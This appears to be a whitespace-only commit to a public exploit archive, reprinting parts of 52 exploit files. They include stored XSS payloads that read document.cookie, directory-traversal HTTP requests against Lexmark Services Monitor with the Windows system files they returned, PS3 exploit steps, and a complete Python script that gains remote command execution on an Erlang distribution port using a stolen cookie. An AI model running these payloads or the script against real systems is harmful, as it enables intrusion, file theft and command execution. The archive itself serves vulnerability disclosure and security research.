DB: 2021-09-03

52 changes to exploits/shellcodes
2021-09-03 21:04:54 +00:00 · 2021-09-03 21:04:54 +00:00 · c9a65a1f7b
commit c9a65a1f7b
parent b4c96a5864
52 changed files with 266 additions and 266 deletions
--- a/exploits/aix/dos/34588.txt
+++ b/exploits/aix/dos/34588.txt
@ -1,9 +1,9 @@
 # Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
 # Date : 9-9-2014
 # Author : jsass
-# Vendor Homepage: http://www.posnic.com/
+# Vendor Homepage: http://www.posnic.com/
-# Software Link: http://sourceforge.net/projects/stockmanagement/
+# Software Link: http://sourceforge.net/projects/stockmanagement/
-# Version: 1.02
+# Version: 1.02
 # Tested on: kali linux
 # Twitter : @KwSecurity
 # Group : Q8 GRAY HAT TEAM
--- a/exploits/android/dos/39629.txt
+++ b/exploits/android/dos/39629.txt
@ -4,8 +4,8 @@ The wireless driver for the Android One (sprout) devices has a bad copy_from_use
 This ioctl is permitted for access from the untrusted-app selinux domain, so this is an app-to-kernel privilege escalation from any app with android.permission.INTERNET.
-See 
+See
- hello-jni.tar.gz for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040.
+ hello-jni.tar.gz for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040.
 [   56.843672]-(0)[880:tx_thread]CPU: 0 PID: 880 Comm: tx_thread Tainted: G        W    3.10.57-g9e1c396 #1
 [   56.844867]-(0)[880:tx_thread]task: dea3b480 ti: cb99e000 task.ti: cb99e000
--- a/exploits/cgi/webapps/34103.txt
+++ b/exploits/cgi/webapps/34103.txt
@ -147,7 +147,7 @@ primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM
 PoC: Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0)
 <td style="vertical-align:middle;text-align:left;white-space:nowrap">
- %20"><iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <=""
+ %20"><iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <=""
 "="[PERSISTENT INJECTED SCRIPT CODE!]< </iframe><input name="user_domain_admin:1"
 id="user_domain_admin:1" value=""[PERSISTENT INJECTED SCRIPT CODE!]" type="hidden"></td>
--- a/exploits/hardware/local/44820.txt
+++ b/exploits/hardware/local/44820.txt
@ -10,14 +10,14 @@ Due to the lack of proper checks after exiting the ROP chain, it is possible in
 ## PLEASE READ FIRST:
 - For best results with the flash dumper, here are the recommended steps.
- Open the browser & browse to the ps3xploit.com website, go to the page of the exploit you need. Set the current page as browser homepage. Don't launch the exploit initialization. Close the browser. 
+- Open the browser & browse to the ps3xploit.com website, go to the page of the exploit you need. Set the current page as browser homepage. Don't launch the exploit initialization. Close the browser.
- Open the browser. The exploit page will load automatically. Choose your dump path option or download the dump.jpg file if you use the hdd edition.
+- Open the browser. The exploit page will load automatically. Choose your dump path option or download the dump.jpg file if you use the hdd edition.
 - Press the exploit initialization button & wait until initialization succeeds. If it fails, follow the refresh/reload instructions on screen.
- Trigger the exploit.
+- Trigger the exploit.
- On success, check your dump with the py checker tool.
+- On success, check your dump with the py checker tool.
 ## Usage Tips:
- Try using a LAN connection or a solid WiFi connection during exploitation. A weak signal can cause problems.
+- Try using a LAN connection or a solid WiFi connection during exploitation. A weak signal can cause problems.
- If the exploit takes more than 5 minutes to work, reload page, browser, or restart console and try again.
+- If the exploit takes more than 5 minutes to work, reload page, browser, or restart console and try again.
- If you are using a LAN connection and experience network issues, make sure all cables to router are in working order.
+- If you are using a LAN connection and experience network issues, make sure all cables to router are in working order.
--- a/exploits/hardware/webapps/21395.txt
+++ b/exploits/hardware/webapps/21395.txt
@ -140,7 +140,7 @@ align=``left``><input name=``ip6`` size=``50`` maxlength=``43`` value=``::/0`` o
 <tr class=``object_tag_row``>
 <td colspan=``2``>Tags</td></tr>
 <tr class=``object_tag_row``>
-<td class=``dep_opt``><label for=``appliedTags``>Applied tags</label></td>
+<td class=``dep_opt``><label for=``appliedTags``>Applied tags</label></td>
 <td><span class=``tag_list`` id=``appliedTags``><span class=``object_tag object_tag_remove``
 mkey=````><[PERSISTENT INJECTED SCRIPT CODE!]'<``=````><span class=``tag_label``>
@ -162,7 +162,7 @@ type=``hidden``>
 <div class=``footer``><input class=``button`` value=``Return``
 onclick=``if (window.opener) {window.close(); } else if (parent && parent.wij_in_modal_op && parent.wij_in_modal_op())
 { parent.wij_end_modal_dialog(); } else {document.location='/success'}`` type=``button``>
-</div></form>
+</div></form>
 ... or
--- a/exploits/hardware/webapps/31765.txt
+++ b/exploits/hardware/webapps/31765.txt
@ -139,7 +139,7 @@ primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM
 PoC: Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0)
 <td style="vertical-align:middle;text-align:left;white-space:nowrap">
- %20"><iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <=""
+ %20"><iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <=""
 "="[PERSISTENT INJECTED SCRIPT CODE!]< </iframe><input name="user_domain_admin:1"
 id="user_domain_admin:1" value=""[PERSISTENT INJECTED SCRIPT CODE!]" type="hidden"></td>
--- a/exploits/hardware/webapps/31790.txt
+++ b/exploits/hardware/webapps/31790.txt
@ -150,7 +150,7 @@ PoC: Create User Object > Create User Expression - Listing
 <tr class="config_module_tr" id="config_module_row_4">
 <td valign="top" width="15"> </td>
-<td valign="top" width="100">Group Match</td>
+<td valign="top" width="100">Group Match</td>
 <td valign="top" width="400"><table class="config_module IT" frame="box" id="group_match_table" rules="none" summary="Box"
 cellpadding="0" cellspacing="0"><tbody><tr bgcolor="#cccccc"><td style="text-align:center;"><b>Pattern</b></td>
@ -158,7 +158,7 @@ cellpadding="0" cellspacing="0"><tbody><tr bgcolor="#cccccc"><td style="text-ali
 id="group_match_pattern" name="group_match_pattern" size="30" type="text"></td><td width="20"><input class="new_button"
 id="+" name="+" onclick="add_group_match_pattern()" value="+" type="button"></td></tr>
 <tr class="pattern"><td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]"></iframe></td><td><input class="new_button" value="-"
-name="0" type="button"></td></tr></tbody></table><input id="pattern_group_match:yes" name="pattern_group_match" value="yes" type="checkbox">
+name="0" type="button"></td></tr></tbody></table><input id="pattern_group_match:yes" name="pattern_group_match" value="yes" type="checkbox">
 <label for="pattern_group_match:yes" style="display:inline">All Group Patterns must match</label></td>
 <td valign="top" width="120"><div id="helpbox"><b class="outlinetop">
@ -175,10 +175,10 @@ If the check box is cleared, only one list item may match. <b>Default</b>: Off</
 ... && Add
-<tbody><tr bgcolor="#cccccc"><td style="text-align:center;" width="100"><b>Name</b></td><td style="text-align:center;"
+<tbody><tr bgcolor="#cccccc"><td style="text-align:center;" width="100"><b>Name</b></td><td style="text-align:center;"
 width="100"><b>Group Match</b></td><td style="text-align:center;" width="50"><b></b></td></tr>
 <tr class="pattern">
-<td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]"></iframe></td><td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]">
+<td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]"></iframe></td><td>a%20>"<[PERSISTENT INJECTED SCRIPT CODE!]">
 </iframe></td><td><img style="cursor:pointer;" name="0" src="/images/edit.png"><input name="0" src="/images/del.png" type="image"></td></tr></tbody>
--- a/exploits/hardware/webapps/33129.html
+++ b/exploits/hardware/webapps/33129.html
@ -1,4 +1,4 @@
-<!--
+<!--
 # Exploit Title: Beetel 450TC2 Router Admin Password Cross Site Request
 Forgery Vulnerability
 # Date: 30/04/2014
--- a/exploits/hardware/webapps/44933.txt
+++ b/exploits/hardware/webapps/44933.txt
@ -1,4 +1,4 @@
-# Exploit Title: Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
+# Exploit Title: Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
 # Date: 2018-06-23
 # Exploit Author: Navina Asrani
 # Version: N-150
--- a/exploits/hardware/webapps/44939.txt
+++ b/exploits/hardware/webapps/44939.txt
@ -1,4 +1,4 @@
-# Exploit Title: Intex Router N-150 - Arbitrary File Upload
+# Exploit Title: Intex Router N-150 - Arbitrary File Upload
 # Date: 2018-06-23
 # Exploit Author: Samrat Das
 # Version: N-150
--- a/exploits/hardware/webapps/47663.txt
+++ b/exploits/hardware/webapps/47663.txt
@ -1,142 +1,142 @@
 # Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
-# Google Dork: N/A
+# Google Dork: N/A
-# Date: 2019-11-15
+# Date: 2019-11-15
-# Exploit Author: Kevin Randall
+# Exploit Author: Kevin Randall
-# Vendor Homepage: https://www.lexmark.com/en_us.html
+# Vendor Homepage: https://www.lexmark.com/en_us.html
-# Software Link: https://www.lexmark.com/en_us.html
+# Software Link: https://www.lexmark.com/en_us.html
-# Version: 2.27.4.0.39 (Latest Version)
+# Version: 2.27.4.0.39 (Latest Version)
-# Tested on: Windows Server 2012
+# Tested on: Windows Server 2012
 # CVE : CVE-2019-16758
-
+
-
+
-Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.
+Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.
-
+
-Timeline:
+Timeline:
-Discovered on: 9/24/2019
+Discovered on: 9/24/2019
-Vendor Notified: 9/24/2019
+Vendor Notified: 9/24/2019
-Vendor Confirmed Receipt of Vulnerability: 9/24/2019
+Vendor Confirmed Receipt of Vulnerability: 9/24/2019
-Follow up with Vendor: 9/25/2019
+Follow up with Vendor: 9/25/2019
-Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019
+Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019
-Vendor Confirmed Vulnerability is Valid: 9/26/2019
+Vendor Confirmed Vulnerability is Valid: 9/26/2019
-Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019
+Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019
-Vendor Confirmed Signoff to Disclose: 9/27/2019
+Vendor Confirmed Signoff to Disclose: 9/27/2019
-Final Email Sent: 9/27/2019
+Final Email Sent: 9/27/2019
-Public Disclosure: 11/15/2019
+Public Disclosure: 11/15/2019
-
+
-PoC:
+PoC:
-
+
-GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1
+GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1
-TE: deflate,gzip;q=0.3
+TE: deflate,gzip;q=0.3
-Connection: TE, close
+Connection: TE, close
-Host: 10.200.15.70:2070
+Host: 10.200.15.70:2070
-User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
+User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
-
+
-HTTP/1.0 200 OK
+HTTP/1.0 200 OK
-Server: rXpress
+Server: rXpress
-Content-Length: 848536
+Content-Length: 848536
-
+
-
+
-.
+.
-.
+.
-.
+.
-.[.P.e.r.f.l.i.b.].
+.[.P.e.r.f.l.i.b.].
-.
+.
-.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.
+.B.a.s.e. .I.n.d.e.x.=.1.8.4.7.
-.
+.
-.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.
+.L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6.
-.
+.
-.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.
+.L.a.s.t. .H.e.l.p.=.3.3.3.4.7.
-.
+.
-.
+.
-.
+.
-.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].
+.[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].
-.
+.
-.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.
+.F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8.
-.
+.
-.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.
+.F.i.r.s.t. .H.e.l.p.=.5.0.2.9.
-.
+.
-.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.
+.L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0.
-.
+.
-.L.a.s.t. .H.e.l.p.=.5.0.4.1.
+.L.a.s.t. .H.e.l.p.=.5.0.4.1.
-.
+.
-.
+.
-.
+.
-.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].
+.[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].
-.
+.
-.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.
+.F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.
-
+
-
+
-GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1
+GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1
-TE: deflate,gzip;q=0.3
+TE: deflate,gzip;q=0.3
-Connection: TE, close
+Connection: TE, close
-Host: 10.200.15.70:2070
+Host: 10.200.15.70:2070
-User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3
-
+
-HTTP/1.0 200 OK
+HTTP/1.0 200 OK
-Server: rXpress
+Server: rXpress
-Content-Length: 38710
+Content-Length: 38710
-
+
-..[.S.t.r.i.n.g.s.].
+..[.S.t.r.i.n.g.s.].
-.
+.
-.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".
+.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.".
-.
+.
-.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".
+.L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).".
-.
+.
-.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".
+.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.".
-.
+.
-.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".
+.L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.".
-.
+.
-.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".
+.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.".
-.
+.
-.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".
+.L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.".
-.
+.
-.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.".
-.
+.
-.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
-.
+.
-.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.".
-.
+.
-.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
+.L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).".
-.
+.
-.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".
+.L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".
-
+
-
+
-
+
-
+
-GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1
+GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1
-TE: deflate,gzip;q=0.3
+TE: deflate,gzip;q=0.3
-Connection: TE, close
+Connection: TE, close
-Host: 10.200.15.70:2070
+Host: 10.200.15.70:2070
-User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)
+User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)
-
+
-HTTP/1.0 200 OK
+HTTP/1.0 200 OK
-Server: rXpress
+Server: rXpress
-Content-Length: 17463
+Content-Length: 17463
-
+
-# Copyright (c) 1993-2004 Microsoft Corp.
+# Copyright (c) 1993-2004 Microsoft Corp.
-#
+#
-# This file contains port numbers for well-known services defined by IANA
+# This file contains port numbers for well-known services defined by IANA
-#
+#
-# Format:
+# Format:
-#
+#
-# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]
+# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]
-#
+#
-
+
-echo                7/tcp
+echo                7/tcp
-echo                7/udp
+echo                7/udp
-discard             9/tcp    sink null
+discard             9/tcp    sink null
-discard             9/udp    sink null
+discard             9/udp    sink null
-systat             11/tcp    users                  #Active users
+systat             11/tcp    users                  #Active users
-systat             11/udp    users                  #Active users
+systat             11/udp    users                  #Active users
-daytime            13/tcp
+daytime            13/tcp
-daytime            13/udp
+daytime            13/udp
-qotd               17/tcp    quote                  #Quote of the day
+qotd               17/tcp    quote                  #Quote of the day
-qotd               17/udp    quote                  #Quote of the day
+qotd               17/udp    quote                  #Quote of the day
-chargen            19/tcp    ttytst source          #Character generator
+chargen            19/tcp    ttytst source          #Character generator
-chargen            19/udp    ttytst source          #Character generator
+chargen            19/udp    ttytst source          #Character generator
-ftp-data           20/tcp                           #FTP, data
+ftp-data           20/tcp                           #FTP, data
-ftp                21/tcp                           #FTP. control
+ftp                21/tcp                           #FTP. control
-ssh                22/tcp                           #SSH Remote Login Protocol
+ssh                22/tcp                           #SSH Remote Login Protocol
-telnet             23/tcp
+telnet             23/tcp
-smtp               25/tcp    mail                   #Simple Mail Transfer Protocol
+smtp               25/tcp    mail                   #Simple Mail Transfer Protocol
 time               37/tcp    timserver
--- a/exploits/ios/webapps/31733.txt
+++ b/exploits/ios/webapps/31733.txt
@ -141,7 +141,7 @@ application user account. For security demonstration or to reproduce the vulnera
 PoC: File Dir Index Listing - filename
-<div id="module_main"><h2>Wi-Fi File Transfer</h2>
+<div id="module_main"><h2>Wi-Fi File Transfer</h2>
 <hr><div class="files"><bq>Files</bq>
 <p><a href="..">..</a><br>     </p><a href="TESTER23.jpg">TESTER23</a>
 (    23.8 Kb, 2014-02-15 13:45:00 +0000)<br>
@ -149,7 +149,7 @@ PoC: File Dir Index Listing - filename
 (    23.8 Kb, 2014-02-15 13:45:46 +0000)<br />
 </p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
 <label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form>
-<hr></div></div></div></center></body></html></iframe></a></div></div>
+<hr></div></div></div></center></body></html></iframe></a></div></div>
 PoC URL: http://localhost:50496/Box/[LOCAL FILE!]
@ -178,7 +178,7 @@ application user account. For security demonstration or to reproduce the vulnera
 PoC: File Dir Index Listing - filename (multiple extensions)
-<div id="module_main"><h2>Wi-Fi File Transfer</h2>
+<div id="module_main"><h2>Wi-Fi File Transfer</h2>
 <hr><div class="files"><bq>Files</bq>
 <p><a href="..">..</a><br>     </p><a href="TESTER23.jpg">TESTER23</a>
 (    23.8 Kb, 2014-02-15 13:45:00 +0000)<br>
@ -186,7 +186,7 @@ PoC: File Dir Index Listing - filename (multiple extensions)
 (    23.8 Kb, 2014-02-15 13:45:46 +0000)<br />
 </p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
 <label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form>
-<hr></div></div></div></center></body></html></iframe></a></div></div>
+<hr></div></div></div></center></body></html></iframe></a></div></div>
 PoC URL: http://localhost:50496/Box/%20image[ARBITRARY FILE UPLOAD VULNERABILITY!].jpg.gif.js.php
--- a/exploits/ios/webapps/34626.txt
+++ b/exploits/ios/webapps/34626.txt
@ -109,7 +109,7 @@ PoC: Web Interface - Index Dir Listing
 <html><head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>WiFi web access</title>
-        </head><body><fontbase family="Arial,Verdana">
+        </head><body><fontbase family="Arial,Verdana">
        <style type="text/css">
            a, div{
                font-family: Arial,Verdana;
@ -376,7 +376,7 @@ PoC: Web Interface - Index Dir Listing
            <div style="height: 30px; width: 120px; left: 15px;" class="uploadify" id="file-upload"><object style="position: absolute; z-index: 1;" id="SWFUpload_0" type="application/x-shockwave-flash" data="/Web/uploadify/uploadify.swf" class="swfupload" height="30" width="120"><param name="wmode" value="transparent"><param name="movie" value="/Web/uploadify/uploadify.swf"><param name="quality" value="high"><param name="menu" value="false"><param name="allowScriptAccess" value="always"><param name="flashvars" value="movieName=SWFUpload_0&uploadURL=%2Fupload.html&useQueryString=false&requeueOnError=false&httpSuccess=&assumeSuccessTimeout=30<33>ms=&filePostName=Filedata&fileTypes=*.*&fileTypesDescription=All%20Files&fileSizeLimit=0&fileUploadLimit=0&fileQueueLimit=999&debugEnabled=false&buttonImageURL=%2F&buttonWidth=120&buttonHeight=30&buttonText=&buttonTextTopPadding=0&buttonTextLeftPadding=0&buttonTextStyle=color%3A%20%23000000%3B%20font-size%3A%2016pt%3B&buttonAction=-110&buttonDisabled=false&buttonCursor=-2"></object><div style="height: 30px; line-height: 30px; width: 120px;" class="uploadify-button " id="file-upload-button"><span class="uploadify-button-text"><3E>berliefern</span></div></div><div class="uploadify-queue" id="file-upload-queue"></div>
            <hr>
-            <a href="#" name="/2.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/2_43698027.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2_43698027.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT" class="document" onclick="aClickHandler(this);" style="position:relative; text-decoration:none;"><img class="aImg" style="" src="/Web/TXT0.png" height="60px" width="60px"><div class="name" style="position:absolute; top:1px !important; top:65px; height:17px; left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:18px;z-index:2000;">>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT</div></a><br/><br/><br/>
+            <a href="#" name="/2.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/2_43698027.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2_43698027.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT" class="document" onclick="aClickHandler(this);" style="position:relative; text-decoration:none;"><img class="aImg" style="" src="/Web/TXT0.png" height="60px" width="60px"><div class="name" style="position:absolute; top:1px !important; top:65px; height:17px; left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:18px;z-index:2000;">>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT</div></a><br/><br/><br/>
        </div>
        <div id="wrap" style="background-color:black; top:0; left:0; width:100%; height:100%; position:absolute; z-index:1000; display:none;">
--- a/exploits/ios/webapps/35083.txt
+++ b/exploits/ios/webapps/35083.txt
@ -102,13 +102,13 @@ low or medium user interaction. For security demonstration or to reproduce the i
 PoC: Folder Plus > THE VERY GAMES - Wifi UI Index
-<tbody><tr style="height:32px"><td style="width:32px"></td><td></td><td style="width:32px"></td></tr>
+<tbody><tr style="height:32px"><td style="width:32px"></td><td></td><td style="width:32px"></td></tr>
 <tr style="height:66px" valign="top">
 <td></td>
 <td id="modal_body1" style="width:336px" align="left">Delete<div style="display: inline-block;"
 class="horz_padding"></div><img src="/?action=extra&path=icons/iconFolder.png" style="width: 16px; height:
 16px; vertical-align: text-top;"><div style="width: 4px;
-display: inline-block;"></div> "><[PERSISTENT INJECTED SCRIPT CODE!]);"><div style="display: inline-block;" class="horz_padding"></div>?</td>
+display: inline-block;"></div> "><[PERSISTENT INJECTED SCRIPT CODE!]);"><div style="display: inline-block;" class="horz_padding"></div>?</td>
 <td></td>
 </tr>
 <tr style="height:32px" valign="middle">
--- a/exploits/linux/webapps/38833.txt
+++ b/exploits/linux/webapps/38833.txt
@ -16,5 +16,5 @@ example:
 for passwd
-(issue fixed in 2012, reintroduced in february 2015. Fixed again november
+(issue fixed in 2012, reintroduced in february 2015. Fixed again november
 2015 for v16)
--- a/exploits/linux/webapps/45090.txt
+++ b/exploits/linux/webapps/45090.txt
@ -1,4 +1,4 @@
-# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)
+# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)
 # Date: 2018-07-22
 # Exploit Author: Zaran Shaikh
 # Version: 2.5.12
--- a/exploits/multiple/remote/49418.py
+++ b/exploits/multiple/remote/49418.py
@ -13,53 +13,53 @@
 # this cookie is commonly called ".erlang.cookie"
 #
 #!/usr/local/bin/python3
-
+
 import socket
 from hashlib import md5
 import struct
 import sys
-
+
 TARGET = "192.168.1.1"
 PORT = 25672
 COOKIE = "XXXXXXXXXXXXXXXXXXXX"
 CMD = "whoami"
-
+
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((TARGET, PORT))
-
+
 name_msg  = b"\x00"
 name_msg += b"\x15"
 name_msg += b"n"
 name_msg += b"\x00\x07"
 name_msg += b"\x00\x03\x49\x9c"
 name_msg += b"AAAAAA@AAAAAAA"
-
+
 s.send(name_msg)
 s.recv(5)                    # Receive "ok" message
 challenge = s.recv(1024)     # Receive "challenge" message
 challenge = struct.unpack(">I", challenge[9:13])[0]
-
+
 print("Extracted challenge: {}".format(challenge))
-
+
 challenge_reply  = b"\x00\x15"
 challenge_reply += b"r"
 challenge_reply += b"\x01\x02\x03\x04"
 challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()
-
+
 s.send(challenge_reply)
 challenge_res = s.recv(1024)
 if len(challenge_res) == 0:
    print("Authentication failed, exiting")
    sys.exit(1)
-
+
 print("Authentication successful")
-
+
 ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
 msg  = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'
 msg += struct.pack(">H", len(CMD))
 msg += bytes(CMD, 'ascii')
 msg += b'jw\x04user'
-
+
 payload = b'\x70' + ctrl + msg
 payload = struct.pack('!I', len(payload)) + payload
 print("Sending cmd: '{}'".format(CMD))
--- a/exploits/multiple/webapps/43177.txt
+++ b/exploits/multiple/webapps/43177.txt
@ -37,7 +37,7 @@ Vulnerable sections:
    Notes
-    Inbox
+    Inbox
 Attack Narratives and Scenarios:
@ -79,7 +79,7 @@ Cookie: Mycookie
 Connection: close
